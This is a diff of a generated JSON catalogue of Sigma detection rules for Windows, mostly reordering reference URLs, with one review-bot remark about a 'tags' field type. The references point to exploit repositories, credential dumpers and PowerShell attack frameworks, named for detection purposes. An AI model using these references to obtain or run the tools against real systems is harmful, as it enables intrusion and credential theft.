@@ -27120,8 +27120,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" ], "tags": [ @@ -27144,10 +27144,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", - "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", "https://twitter.com/ScumBots/status/1610626724257046529", + "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", + "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], "tags": [ 
@@ -27326,19 +27326,19 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/samratashok/nishang", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://adsecurity.org/?p=2921", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/HarmJ0y/DAMP", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/HarmJ0y/DAMP", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/samratashok/nishang", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ 
@@ -27443,8 +27443,8 @@ "logsource.product": "windows", "refs": [ "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", - "https://www.shellhacks.com/clear-history-powershell/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://www.shellhacks.com/clear-history-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ @@ -27585,9 +27585,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], "tags": "No established tags" @@ -27843,8 +27843,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" ], "tags": [ 
@@ -27945,8 +27945,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" ], "tags": [ @@ -28474,9 +28474,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://github.com/GhostPack/KeeThief", "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/denandz/KeeFarce", + "https://github.com/GhostPack/KeeThief", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" ], "tags": [ @@ -28509,8 +28509,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1090588499517079552", "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://twitter.com/SBousseaden/status/1090588499517079552", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" ], "tags": [ 
@@ -28812,11 +28812,11 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", - "https://github.com/fengjixuchui/gdrv-loader", - "https://twitter.com/malmoeb/status/1551449425842786306", - "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://twitter.com/malmoeb/status/1551449425842786306", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml" ], "tags": [ 
@@ -28865,18 +28865,18 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/jbaines-r7/dellicious", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://github.com/namazso/physmem_drivers", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://github.com/namazso/physmem_drivers", "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" ], "tags": [ 
@@ -29011,22 +29011,22 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/jbaines-r7/dellicious", - "https://github.com/tandasat/ExploitCapcom", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://github.com/namazso/physmem_drivers", + "https://github.com/tandasat/ExploitCapcom", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/stong/CVE-2020-15368", - "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - 
"https://github.com/namazso/physmem_drivers", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ @@ -29177,8 +29177,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://systeminformer.sourceforge.io/", "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" ], @@ -29213,8 +29213,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml" ], "tags": [ @@ -29238,8 +29238,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/alfarom256/CVE-2022-3699/", "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" ], "tags": [ 
@@ -29308,9 +29308,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://twitter.com/M_haggis/status/1032799638213066752", "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" ], "tags": [ @@ -29352,8 +29352,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://pypi.org/project/scapy/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://pypi.org/project/scapy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ @@ -29404,9 +29404,9 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" ], "tags": [ 
@@ -29503,8 +29503,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" ], "tags": [ @@ -29630,8 +29630,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" ], "tags": [ @@ -29890,10 +29890,10 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://twitter.com/M_haggis/status/900741347035889665", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" ], "tags": [ 
@@ -29926,8 +29926,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" ], "tags": [ @@ -30211,8 +30211,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://ngrok.com/", "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" ], "tags": [ @@ -30245,8 +30245,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" ], "tags": [ @@ -30355,8 +30355,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/forensicitguy/status/1513538712986079238", "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://twitter.com/forensicitguy/status/1513538712986079238", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" ], "tags": [ 
@@ -30389,8 +30389,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" ], "tags": "No established tags" @@ -30411,8 +30411,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" ], "tags": [ @@ -30478,8 +30478,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" ], "tags": [ @@ -30512,8 +30512,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2398", "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" ], "tags": [ 
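Review bot: The `"tags": "No established tags"` line in this hunk gives `tags` a string value, while every other entry in this chunk uses an array, so a consumer that iterates `tags` or validates the cluster against a schema expecting an array will fail on this one entry. The line is unchanged context, so this is presumably emitted by the generator whenever a rule has no tags; `"tags": []` keeps the shape stable, or the key can be omitted entirely. Worth checking whether other entries in the file carry the same sentinel string.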
@@ -30554,8 +30554,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/binderlabs/DirCreate2System", + "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ @@ -30581,9 +30581,9 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], 
@@ -30786,11 +30786,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://www.google.com/search?q=procdump+lsass", "https://github.com/helpsystems/nanodump", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://www.google.com/search?q=procdump+lsass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ @@ -30857,8 +30857,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/Dumpert", "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" ], "tags": [ 
@@ -30951,9 +30951,9 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], @@ -31286,8 +31286,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/afwu/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" ], @@ -31638,9 +31638,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" ], "tags": [ 
@@ -31766,10 +31766,10 @@ "logsource.product": "windows", "refs": [ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ @@ -31793,8 +31793,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/last-byte/PersistenceSniper", + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" ], "tags": [ 
@@ -31851,21 +31851,21 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/samratashok/nishang", "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/HarmJ0y/DAMP", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/nettitude/Invoke-PowerThIEf", "https://github.com/AlsidOfficial/WSUSpendu/", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://github.com/NetSPI/PowerUpSQL", "https://github.com/CsEnox/EventViewer-UACBypass", "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/samratashok/nishang", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": 
[ @@ -31898,8 +31898,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], @@ -32093,8 +32093,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/powershellprofile.html", "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://persistence-info.github.io/Data/powershellprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ @@ -32359,8 +32359,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/14", "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/14", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" ], "tags": [ 
